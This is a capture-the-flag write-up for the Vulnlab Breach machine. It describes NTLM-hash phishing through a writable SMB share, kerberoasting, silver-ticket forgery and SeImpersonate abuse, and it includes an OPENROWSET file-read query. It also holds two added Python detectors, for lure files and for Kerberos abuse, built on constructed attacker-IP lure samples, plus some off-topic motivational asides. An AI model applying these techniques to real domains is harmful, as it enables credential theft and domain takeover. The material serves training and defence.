Breach - Vulnlab

The document discusses compromising the Breach machine in Vulnlab. It involves phishing credentials from a writable SMB share, kerberoasting the MSSQL service account, and using silver tickets to escalate privileges and compromise the domain controller. The summary discusses key steps like exploiting the SMB share to get initial access, kerberoasting the MSSQL account, using silver tickets to authenticate as Administrator in the MSSQL context, and abusing SeImpersonate privileges to fully compromise the domain controller.

Uploaded by djiraud

Breach - Vulnlab

Overview
What's good yodie family, it's ya boy tobeatelitto here back with another banger. Today we're
taking a look at Breach, probably my favorite machine in xct's Vulnlab. It involves phishing a user
through a writable SMB share, kerberoasting the service account for MSSQL, and abusing
silver tickets to escalate privileges and compromise a DC.

Initial Enumeration

Port 88 (Kerberos) is open, so the machine is a domain controller. Aside from that
it looks like a standard Windows box, although MSSQL is exposed, which could be interesting.

Anyway, we can continue to enumerate services. The web server at http://breach.vl:80
presents a default IIS page, so there is nothing there. We check SMB and it turns out that
anonymous R/W access is available for \\breach.vl\share, which I thought was very PECULIAR
PECULIAR PECULIAR PECULIAR PECULIAR.
SMB Share
We can enumerate the share and see that it's empty. There are a few usernames we can get from
the folder names.

It's probably just a share that the domain users use to send files to one another. Since we have
write access, we can try to pump it full of file types that force authentication back to our attacker
machine, and hopefully some idiot will authenticate to us.

On a side note (unnecessary and irrelevant in this situation), you can always
confirm that the users who have directories in the share are valid domain users with kerbrute.
Anyway, we generate a bunch of files for our phishing using Greenwolf/ntlm_theft, and
eventually we get a hash back, which we crack. Of course, this (and everything else in this
writeup) is horrible from an OPSEC perspective, but whatever, I'm not an operator.
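The defender's counterpart to the lure drop above, added here as an example that is not part of the original writeup: a small audit script that walks a share and flags files of the auto-resolving types (the kinds ntlm_theft produces) whose embedded UNC path points at a host outside an allowlist. The share layout, the user folder j.doe, the IP 10.10.14.5 and the host fileserver.breach.vl are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Extensions Windows resolves automatically when a folder is browsed or a file is opened,
# so an embedded UNC path makes the client authenticate to that host (the ntlm_theft lure types).
LURE_EXTENSIONS = {".scf", ".url", ".lnk", ".library-ms", ".xml", ".rtf", ".htm", ".html", ".docx"}
# UNC host capture for 8-bit text and for the UTF-16LE strings stored inside binary .lnk files.
UNC_RE = re.compile(rb"\\\\([A-Za-z0-9._-]+)\\")
UNC_RE_UTF16 = re.compile(rb"\\\x00\\\x00((?:[A-Za-z0-9._-]\x00)+)\\\x00")

def unc_hosts(data: bytes) -> set:
    hosts = {m.decode("latin-1") for m in UNC_RE.findall(data)}
    hosts |= {m.decode("utf-16-le") for m in UNC_RE_UTF16.findall(data)}
    return {h.lower() for h in hosts}

def scan_share(root, allowed_hosts):
    """Return sorted (relative path, host) pairs for lure-type files whose UNC target is
    not an allowlisted internal host; an empty list means the share carries no such lure."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in LURE_EXTENSIONS:
            rel = path.relative_to(root).as_posix()
            findings += [(rel, h) for h in sorted(unc_hosts(path.read_bytes()) - allowed)]
    return sorted(findings)

def demo():
    """Constructed share contents: a lure pointing at an outside IP, a legitimate shortcut
    pointing at an internal host, a minimal .lnk-like blob, and a text file (never auto-resolved)."""
    with tempfile.TemporaryDirectory() as share:
        user_dir = Path(share, "j.doe"); user_dir.mkdir()
        Path(user_dir, "@readme.scf").write_text(
            "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.14.5\\share\\icon.ico\r\n")
        Path(share, "intranet.url").write_text(
            "[InternetShortcut]\r\nURL=https://intranet.breach.vl/\r\n"
            "IconFile=\\\\fileserver.breach.vl\\icons\\web.ico\r\n")
        Path(share, "calendar.lnk").write_bytes(
            b"L\x00\x00\x00" + "\\\\10.10.14.5\\share\\".encode("utf-16-le"))
        Path(share, "notes.txt").write_text("see \\\\10.10.14.5\\share\\ for details")
        return scan_share(share, allowed_hosts={"breach.vl", "fileserver.breach.vl"})
```

Run it against a mounted copy of the share; anything it returns is a file that will make browsing clients authenticate to a host you do not own.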

Lateral Movement
With a domain user compromised we have a lot more pathways open to us: we could do a
BloodHound ingest and look for AD abuses, look for new SMB shares we may have
access to, or kerberoast. For the sake of time I'll skip to the correct method forward,
kerberoasting.

High Level Overview of Kerberoasting

We compromise the MSSQL service account.

Yodie family we have everything we need in the present moment you feel me? All that matters is
that we pursue our purpose and mission; but remember family you won't be striving to succeed
on your mission by wasting time thinking about the past or worrying about the future. You won't
find it scrolling through TikTok or Instagram reyel stuffff. Remember that every day is not going to
be 100%, so it's OK to not be perfect, but you still have to stay focused on the mission
gangington fr fr.

Silver Ticket Abuse


Anyhow, since we have now compromised a service account, we can abuse silver tickets to
escalate our privileges.

Service accounts (accounts tied to SPNs) are powerful because if someone compromises
them, they can use silver tickets to impersonate any user in the context of that service.

I will not explain the inner workings of the attack, but xct has a nice blog post on the theory
behind it and ired.team has a nice example of the attack; I recommend you at least
skim them both.

Each service account differs in how dangerous its compromise can be, but the MSSQL
service account can lead to the compromise of the machine MSSQL is running on. MSSQL is
running on the DC itself in this case, so we have a clear path to both local and domain admin.
There are two extra things we need to create a silver ticket for MSSQL: the NT hash of the service
account, and the domain SID. To get the NT hash I went here and converted the clear-text
password into the hash, and to get the SID I used enum4linux because I was lazy and didn't
have a BloodHound ingest.

With these, we can use ticketer.py to forge a silver ticket that lets us authenticate as
Administrator in the context of MSSQL.
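Added example (not from the writeup): how a SOC could spot the two Kerberos steps used here from DC event logs. Kerberoasting shows up as one user obtaining RC4 (0x17) service tickets for several user-account SPNs in a short window; a silver ticket shows up as a Kerberos logon (4624) on the host for which the DC never issued a matching service ticket (4769), because the forged ticket was built offline from the service account's hash. The events, the account names (Julia.Wong, svc_mssql, svc_backup, BREACHDC) and the service-to-host mapping are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType in 4769; roasting tools ask for RC4 so the hash cracks fast
# Assumption for the demo: which service accounts run on which host (computer account for CIFS etc.).
SERVICE_ACCOUNTS = {"breachdc": {"breachdc$", "svc_mssql"}}

def kerberoast_suspects(events, min_spns=2, window=timedelta(minutes=5)):
    """Users that obtained RC4 service tickets for several distinct user-account SPNs quickly."""
    by_user = defaultdict(list)
    for e in events:
        if e["id"] == 4769 and e["enc"] == RC4_HMAC and not e["service"].endswith("$"):
            by_user[e["user"]].append((e["time"], e["service"]))
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            spns = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(spns) >= min_spns:
                hits[user] = sorted(spns)
                break
    return hits

def silver_ticket_suspects(events, slack=timedelta(hours=10)):
    """Kerberos logons on a host with no 4769 for that user and any of the host's service
    accounts within one ticket lifetime: a forged ticket never touches the DC."""
    issued = defaultdict(list)
    for e in events:
        if e["id"] == 4769:
            issued[(e["user"].lower(), e["service"].lower())].append(e["time"])
    hits = []
    for e in events:
        if e["id"] == 4624 and e["auth"] == "Kerberos":
            accounts = SERVICE_ACCOUNTS.get(e["host"].lower(), set())
            backed = any(timedelta(0) <= e["time"] - t <= slack
                         for svc in accounts for t in issued.get((e["user"].lower(), svc), []))
            if not backed:
                hits.append((e["user"], e["host"]))
    return hits

# Constructed sample (not real logs): the phished user roasts two SPNs, then an "Administrator"
# Kerberos logon appears on the DC's MSSQL host although no ticket for it was ever issued.
def at(minute): return datetime(2023, 3, 27, 9, minute)
SAMPLE = [
    {"id": 4769, "time": at(0), "user": "Julia.Wong", "service": "svc_mssql", "enc": "0x17"},
    {"id": 4769, "time": at(1), "user": "Julia.Wong", "service": "svc_backup", "enc": "0x17"},
    {"id": 4769, "time": at(2), "user": "Julia.Wong", "service": "BREACHDC$", "enc": "0x12"},
    {"id": 4624, "time": at(3), "user": "Julia.Wong", "host": "BREACHDC", "auth": "Kerberos"},
    {"id": 4624, "time": at(30), "user": "Administrator", "host": "BREACHDC", "auth": "Kerberos"},
]
```

Real 4769/4624 records have to be parsed from EVTX into this dict shape first; the wide correlation window reflects the default 10-hour service ticket lifetime.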

Anyway, there are two methods to root from here. It was actually jkr, my second favourite true
German geezer, that showed this first method in the vl breach channel. The way was simply to
read the root flag, since MSSQL can read files, and we are allowed to read any files the
Administrator can.

SELECT * FROM OPENROWSET(
    BULK N'C:\Users\Administrator\Desktop\root.txt',
    SINGLE_CLOB
) AS Contents

The second involves a complete compromise.

MSSQL Admin -> Local Admin


They will try everything they can to distract you from the mission with their bad energies type
stuff. A lot of us be thinking a lot of silly thoughts throughout the day, and it's not even our own
thoughts you feel me? Most of the time the thoughts in our mind are not our own, especially
when they're like negative or toxic thoughts. It's really just a reflection of our vibrations you feel
me? But when you raise your vibration you eliminate those negative thoughts gangington.
Reyyyelll stuff.

Back to the box: the first order of business is to get a shell. We are the MSSQL admin, so we can
use xp_cmdshell to execute commands. I like to use hoaxshell because it's pretty stable and
easy to use for when I don't feel like getting out a big C2. Immediately we see that
SeImpersonate is enabled for our user.

Abusing SeImpersonate is as easy as always:


And that's it. GG.

2023/03/27 ToBeatElite
